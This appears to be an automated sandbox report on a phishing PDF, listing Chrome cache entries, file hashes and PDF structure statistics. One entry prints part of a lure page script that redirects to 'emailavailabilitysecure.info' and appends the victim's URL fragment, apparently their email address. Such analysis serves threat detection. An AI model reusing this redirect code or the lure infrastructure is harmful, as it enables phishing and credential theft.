                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Nov 12 14:23:10 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                          Category:dropped
                          Size (bytes):2677
                          Entropy (8bit):3.999802264521079
                          Encrypted:false
                          SSDEEP:
                          MD5:56667C345C880BC2D254ECDFCC3A3994
                          SHA1:11189CC07FD4FE115D181F6D3C58E1C7E3605F48
                          SHA-256:225B09714B3EF939DB76F278B5AE2B9F240F547055D47B96915F890029982699
                          SHA-512:B44C8E5F987BF20A57C8C771F4110696E8C621C526C73C46F0647012FAB0A54FD23810A7EB7560BD73ABBB7622442406AFD885C9E6EC1102694A29807EC08D69
                          Malicious:false
                          Reputation:unknown
                          Preview:L..................F.@.. ...$+.,....*.B..5..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IlY.z....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VlY.z....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VlY.z....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VlY.z..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VlY.z...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............X.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Nov 12 14:23:10 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                          Category:dropped
                          Size (bytes):2677
                          Entropy (8bit):3.984574736595405
                          Encrypted:false
                          SSDEEP:
                          MD5:1737525D42A4A5198A0E8FA22194F81D
                          SHA1:87EF5C4D3557AD429B67EC8AD9EA4201FF3D52D7
                          SHA-256:A1588C4C92CC7C4824E5BE6A157F9ADBC02184829D47934F2B9D3AB739B2A5B2
                          SHA-512:CB7A17173C9767B97DE6F91369C00E4E4E212C45E47AACBF39B31E2F1AE6B535AFA02BB07978EFCC973E811B7BA14E8591E9D8522A3E311F5786835152C49E0A
                          Malicious:false
                          Reputation:unknown
                          Preview:L..................F.@.. ...$+.,....b.N..5..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IlY.z....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VlY.z....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VlY.z....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VlY.z..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VlY.z...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............X.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Nov 12 14:23:10 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                          Category:dropped
                          Size (bytes):2679
                          Entropy (8bit):3.99256294866054
                          Encrypted:false
                          SSDEEP:
                          MD5:99393E059D94E9A8A2FCA270D056F657
                          SHA1:CDEB123341185BB994AA4A7648A7E0D6FF1ADBE5
                          SHA-256:3AC22F39D634CED8B66614EC8BDFD39F82D7CC2C8C20A5B223BFD4BC996B68C2
                          SHA-512:72083A2B52ABA50CE9E68D422D19E0EF07C5A4F320E2FC091922186E5A12009EC0D0112F4CA68024E9386840C4C28A5DD79A0CE29E070795DF2EE02BB18319EB
                          Malicious:false
                          Reputation:unknown
                          Preview:L..................F.@.. ...$+.,..... 8..5..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IlY.z....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VlY.z....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VlY.z....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VlY.z..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VlY.z...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............X.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                          Chrome Cache Entry: 170

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (65447)
                          Category:downloaded
                          Size (bytes):89501
                          Entropy (8bit):5.289893677458563
                          Encrypted:false
                          SSDEEP:
                          MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                          SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                          SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                          SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                          Malicious:false
                          Reputation:unknown
                          URL:https://code.jquery.com/jquery-3.6.0.min.js
                          Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct

                          Chrome Cache Entry: 173

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:HTML document, ASCII text, with very long lines (65353), with CRLF line terminators
                          Category:downloaded
                          Size (bytes):104615
                          Entropy (8bit):5.962045330195449
                          Encrypted:false
                          SSDEEP:
                          MD5:9B08732027FE0EE456C99E480C307C02
                          SHA1:C0E39DA8C09E52F6271699DDD6613633E017F4B4
                          SHA-256:6B0EC1E20077D320E0D207F49359613ABE225677828F7D46F00A0D53B34BB214
                          SHA-512:7C4B329B053D92A99C42F02B3001DDDEEDC860922C25F4DF7CC274CF5F5D489561768096B75B33A9220E9FD0004E083FD50C032BF7D509CE62DB857B9004B611
                          Malicious:false
                          Reputation:unknown
                          URL:https://pub-ded8309031d344399056bf442a8ef815.r2.dev/derxydomainfreshlink.html
                          Preview:<script>....let ulink = "https://emailavailabilitysecure.info/doc74387//#".. let ai = `${ulink}${window.location.hash.substring(1)}`;.. let bi = "https://amazon.com/";....let imageUrl = 'data:image/jpeg;base64,/9j/4AAQSkZJRgABAQEAkACQAAD/4gHbSUNDX1BST0ZJTEUAAQEAAAHLAAAAAAJAAABtbnRyUkdCIFhZWiAAAAAAAAAAAAAAAABhY3NwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAA9tYAAQAAAADTLVF0BQ8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlyWFlaAAAA8AAAABRnWFlaAAABBAAAABRiWFlaAAABGAAAABR3dHB0AAABLAAAABRjcHJ0AAABQAAAAAxyVFJDAAABTAAAACBnVFJDAAABTAAAACBiVFJDAAABTAAAACBkZXNjAAABbAAAAF9YWVogAAAAAAAAb58AADj0AAADkVhZWiAAAAAAAABilgAAt4cAABjcWFlaIAAAAAAAACShAAAPhQAAttNYWVogAAAAAAAA808AAQAAAAEWwnRleHQAAAAATi9BAHBhcmEAAAAAAAMAAAACZmYAAPKnAAANWQAAE9AAAApbZGVzYwAAAAAAAAAFc1JHQgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/2wBDAAQDAwQDAwQEAwQFBAQFBgoHBgYGBg0JCggKDw0QEA8NDw4RExgUERIXEg4PFRwVFxkZGxsbEBQdHx0aHxgaGxr/2wBDAQQFBQYFBgwHBwwa

                          Chrome Cache Entry: 174

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:JSON data
                          Category:downloaded
                          Size (bytes):23
                          Entropy (8bit):3.7950885863977324
                          Encrypted:false
                          SSDEEP:
                          MD5:F55FCB2CDD44B93560BC063DE404C76D
                          SHA1:7EB2CE140F2B9ED67D5AC33ED73AF2197CE569D9
                          SHA-256:57CFB4BEE90CB15A3611C9570EAEE41ADFED6F737DDB9CDE5542F47E5B421894
                          SHA-512:B29505113449BBFD096C5216605F0EC379AD8524AF9D5F9A80CE8F6A34A5D5542463D93339B4D7CA93B5F2C15CB7E7E82CF2A02D58B5355B956CE37502B398DF
                          Malicious:false
                          Reputation:unknown
                          URL:https://api.ipify.org/?format=json
                          Preview:{"ip":"173.254.250.68"}

                          Chrome Cache Entry: 175

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (47992), with no line terminators
                          Category:dropped
                          Size (bytes):47992
                          Entropy (8bit):5.605846858683577
                          Encrypted:false
                          SSDEEP:
                          MD5:CF3402D7483B127DED4069D651EA4A22
                          SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                          SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                          SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                          Malicious:false
                          Reputation:unknown
                          Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null

                          Chrome Cache Entry: 176

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):40
                          Entropy (8bit):4.120950594454667
                          Encrypted:false
                          SSDEEP:
                          MD5:B09F000BFB98ABD880BC77E05456FFEA
                          SHA1:FBADFA7F41B709507692B8FCEA597474EED91E2C
                          SHA-256:0A721532497036FF7D8B228DD8D4EF5E91777B0BD2B11F49F5B2CCDDD55EB259
                          SHA-512:F2E0CF9FD6D14EAF9BE953052515A598E9F96186FB82D5FA8D3E9B01F9706284DE8DDDF343AB69CF566EDEB28C659D65E0D608F99A5717A7CBFB2CC48ADA15A7
                          Malicious:false
                          Reputation:unknown
                          Preview:{"detail":"Method \"GET\" not allowed."}

                          Chrome Cache Entry: 177

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:HTML document, ASCII text, with very long lines (611)
                          Category:downloaded
                          Size (bytes):27150
                          Entropy (8bit):4.357340680151037
                          Encrypted:false
                          SSDEEP:
                          MD5:46DD133EE00DC1BAE5E4EEBA7B88432F
                          SHA1:8AF86A4AC91CE48C062216FB94A6E1D57618A19B
                          SHA-256:9EB52EE46C7AB5EA4CA0982415DA99FDED1B7D7354F75E50847BDAE6CB44EB66
                          SHA-512:CB49F9E3812E2C262AF374E79BD8905CB508A45BF2C2D6AF62EED85AF43770872486A55E9425882FEDA9FB3A57A317A3C18BE1E286ADAF0C76BE7F1B0DFA8474
                          Malicious:false
                          Reputation:unknown
                          URL:https://pub-ded8309031d344399056bf442a8ef815.r2.dev/favicon.ico
                          Preview:<!DOCTYPE html>.<html lang="en">. <head>. <meta charset="UTF-8" />. <meta name="viewport" content="width=device-width, initial-scale=1.0" />. <link rel="icon" href="https://www.cloudflare.com/favicon.ico" />. <title>Not Found</title>. <style>. body {. font-family: system-ui;. font-weight: 300;. font-size: 1.25rem;. color: #36393a;. display: flex;. align-items: center;. justify-content: center;. }. main {. max-width: 1200px;. margin-top: 120px;. display: flex;. flex-wrap: wrap;. align-items: center;. justify-content: center;. }. #text {. max-width: 60%;. margin-left: 1rem;. margin-right: 1rem;. }. main > section > div {. margin-bottom: 3.25rem;. }. svg {. margin-left: 2rem;. }. @keyframes eye-1 {. 0% {. transform: translateX(0);. }. 10%,. 50% {. tr

                          Chrome Cache Entry: 178

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with no line terminators
                          Category:downloaded
                          Size (bytes):128
                          Entropy (8bit):5.13621121637073
                          Encrypted:false
                          SSDEEP:
                          MD5:90B2E18E709922EBE34926FCA6C736F6
                          SHA1:4C478C1F134CC54C82377BF5561B4CA4CC4F8E5F
                          SHA-256:218CC8157BB4D0D8A5853274A2F04E621F3A4FC01E21C180759503F9C1968392
                          SHA-512:D612B65DD23A402D564DF9BB4E8FD95E9B09EFCDC1C298F5E07343EC3A568A7464ED4C28B609A629BFE49E8DB78F48EEBEA0B1026F2F0BEB69649632ED3B32A0
                          Malicious:false
                          Reputation:unknown
                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISLAk8jt6_q9BG5xIFDaXtx4USBQ0B_SbtEgUNepTjKxIFDZWvjf0SBQ2Vr439EiwJHyFyub6JvE4SBQ2l7ceFEgUNAf0m7RIFDXqU4ysSBQ2Vr439EgUNla-N_Q==?alt=proto
                          Preview:Ci0KBw2l7ceFGgAKBw0B/SbtGgAKBw16lOMrGgAKBw2Vr439GgAKBw2Vr439GgAKLQoHDaXtx4UaAAoHDQH9Ju0aAAoHDXqU4ysaAAoHDZWvjf0aAAoHDZWvjf0aAA==

                          Chrome Cache Entry: 180

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (48316), with no line terminators
                          Category:downloaded
                          Size (bytes):48316
                          Entropy (8bit):5.6346993394709
                          Encrypted:false
                          SSDEEP:
                          MD5:2CA03AD87885AB983541092B87ADB299
                          SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                          SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                          SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                          Malicious:false
                          Reputation:unknown
                          URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                          Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();

                          Static File Info

                          General

                          File type:PDF document, version 1.7, 0 pages
                          Entropy (8bit):7.910131794082582
                          TrID:
                          • Adobe Portable Document Format (5005/1) 100.00%
                          File name:scan3762399_arleen@wcctxlaw.com.pdf
                          File size:20'225 bytes
                          MD5:55291e9f9037ee53a9605772fa7a5cf7
                          SHA1:a0af9b6b729afdf26c31f9e3dffed68896d28ff2
                          SHA256:33b47fad1df53235b08cf678442a7ef0f87678a4f33212abafee24294fe1c490
                          SHA512:1cb5044957c057d0c660d87162810180fb26dd47aec8082b9a541d210127498ab426a48a70da36c4c5b5c49dc94c3f560c37f54f7adbfa362a7d6814819971df
                          SSDEEP:384:EgFcIANS9esuCjWTSvQcSE6oXgwR89QDwCBH7Q1FnV866vrxyxE7xd/o:PF5ANS9UCaTEQFElNR8EwCBbCG66jIee
                          TLSH:8992D077F50DEC64D883CA5522A437936C1CB7C3C9C838F4366BC555AAA808AF156A93
                          File Content Preview:%PDF-1.7.1 0 obj.<< /Type /Catalog./Outlines 2 0 R./Pages 3 0 R >>.endobj.2 0 obj.<< /Type /Outlines /Count 0 >>.endobj.3 0 obj.<< /Type /Pages./Kids [6 0 R.]./Count 1./Resources <<./ProcSet 4 0 R./Font << ./F1 8 0 R./F2 9 0 R.>>./XObject << ./I1 10 0 R./

                          File Icon

                          Icon Hash:62cc8caeb29e8ae0

                          Static PDF Info

                          General

                          Header:%PDF-1.7
                          Total Entropy:7.910132
                          Total Bytes:20225
                          Stream Entropy:7.950593
                          Stream Bytes:18446
                          Entropy outside Streams:5.111962
                          Bytes outside Streams:1779
                          Number of EOF found:1
                          Bytes after EOF:

                          Keywords Statistics

                          NameCount
                          obj11
                          endobj11
                          stream3
                          endstream3
                          xref1
                          trailer1
                          startxref1
                          /Page1
                          /Encrypt0
                          /ObjStm0
                          /URI0
                          /JS0
                          /JavaScript0
                          /AA0
                          /OpenAction0
                          /AcroForm0
                          /JBIG2Decode0
                          /RichMedia0
                          /Launch0
                          /EmbeddedFile0

                          Image Streams

                          IDDHASHMD5Preview
                          102a3995db69e9c2d612ff6a5e2d13275114a6d536875e1786
                          1150e4d654722d3834a46aa110534bec6b8db3ed46c4ac3a8e